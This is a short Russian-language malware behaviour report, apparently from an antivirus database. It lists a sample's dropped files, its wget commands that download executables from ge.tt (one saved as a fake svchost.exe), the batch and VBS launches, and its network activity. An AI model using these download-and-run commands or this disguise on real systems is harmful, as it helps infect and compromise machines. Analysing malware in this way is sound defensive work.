Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%APPDATA%\mindcrasher.exe'
- '%APPDATA%\svchost.exe'
- '%APPDATA%\wget.exe' http://ge.tt/api/1/files/3zdsT0l/0/blob?do###### -O "%APPDATA%\svchost.exe"
- '%APPDATA%\wget.exe' http://ge.tt/api/1/files/88eYI3l/0/blob?do###### -O "%APPDATA%\mindcrasher.exe"
- '%APPDATA%\svchost.exe' (загружен из сети Интернет)
- '%APPDATA%\mindcrasher.exe' (загружен из сети Интернет)
Запускает на исполнение:
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\run.bat" "
- '<SYSTEM32>\wscript.exe' "%APPDATA%\start.vbs"
Изменения в файловой системе:
Создает следующие файлы:
- %APPDATA%\svchost.exe
- %APPDATA%\mindcrasher.exe
- %APPDATA%\wget.exe
- %APPDATA%\run.bat
- %APPDATA%\start.vbs
Сетевая активность:
Подключается к:
- 'ge.tt':80
TCP:
Запросы HTTP GET:
- ge.tt/api/1/files/88eYI3l/0/blob?do######
- ge.tt/api/1/files/3zdsT0l/0/blob?do######
UDP:
- DNS ASK ge.tt
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
